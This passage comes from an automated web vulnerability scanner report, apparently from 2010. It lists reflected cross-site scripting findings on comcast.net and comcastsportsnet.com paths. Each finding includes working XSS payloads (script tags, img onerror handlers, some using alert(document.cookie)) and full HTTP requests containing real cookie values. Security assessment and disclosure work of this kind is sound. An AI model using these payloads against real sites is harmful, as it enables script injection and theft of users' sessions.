This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/politicsc34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:28 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: politicsc34ca--><img src=a onerror=alert(1)>6cceb973248 -->
...[SNIP]...

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8771d"><script>alert(1)</script>ed2178a344a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/world8771d"><script>alert(1)</script>ed2178a344a/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:12 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<link rel="alternate" href="/feeds/rss/news/world8771d"><script>alert(1)</script>ed2178a344a/" type="application/rss+xml" title="Comcast.net - News" id="rss" />
...[SNIP]...

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567 was submitted in the REST URL parameter 2. This input was echoed as 94c04<img src=a onerror=alert(1)>82df29b4567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/world94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:24 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='news' subchannel'world94c04<img src=a onerror=alert(1)>82df29b4567'</h2>
...[SNIP]...

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /news/world/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd was submitted in the REST URL parameter 2. This input was echoed as bedb8--><img src=a onerror=alert(1)>e40b1a4d5bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/worldbedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: worldbedb8--><img src=a onerror=alert(1)>e40b1a4d5bd -->
...[SNIP]...

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/entertainment-mostpopulargooglesearches2010/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f48"><script>alert(1)</script>bce088a4eb7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; ev41=%26%23039%3B; xuc=c=2; page_counts=2,2; s_lastVisit=11/2010; prefs=pagemsg.state=false; s_cc=true; s_campaign=NET_33_0; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; mbox=check#true#1292781931|session#1292781870292-178614#1292783731

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:06:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:11:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:06:31 GMT
Connection: close
Content-Length: 32456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/entertainment-mostpopulargooglesearches2010f3f48"><script>alert(1)</script>bce088a4eb7/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/finance-branddisasters/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c9a"><script>alert(1)</script>cf869bb5a0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:31 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:31 GMT
Content-Length: 31820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/music-greenday

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>2b6b246c1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:35 GMT
Content-Length: 31730
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/news-spacepictures

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cae2"><script>alert(1)</script>5af3151e2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:32 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:32 GMT
Content-Length: 31725
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /slideshow/sports-bestdressedathletes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef90d"><script>alert(1)</script>0349d93d9fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:11:33 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:16:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:11:33 GMT
Content-Length: 31876
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <m
...[SNIP]...
<a href="/slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/" rel="emailthis track(Send to Friend - Slideshow)">
...[SNIP]...

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/19103/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 74f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f was submitted in the REST URL parameter 2. This input was echoed as 74f43--><img src=a onerror=alert(1)>935e2e5728f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /weather/1910374f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<!-- subchannel: 1910374f43--><img src=a onerror=alert(1)>935e2e5728f -->
...[SNIP]...

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5 was submitted in the REST URL parameter 2. This input was echoed as 2f676<img src=a onerror=alert(1)>46d5a7f7ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5/a HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:35:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:40:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:35:40 GMT
Connection: close
Content-Length: 37346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src=a onerror=alert(document.cookie)>935e2e5728f2f676<img src=a onerror=alert(1)>46d5a7f7ec5 -->
...[SNIP]...

2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84 was submitted in the REST URL parameter 2. This input was echoed as 90356><img src=a onerror=alert(1)>54eae5f6d84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /weather/1910374f43--%3E%3Cimg%20src90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:37:57 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:42:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:37:57 GMT
Connection: close
Content-Length: 37360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src90356><img src=a onerror=alert(1)>54eae5f6d84=a onerror=alert(document.cookie)>
...[SNIP]...

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57e8b<script>alert(1)</script>f39eff7e154 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
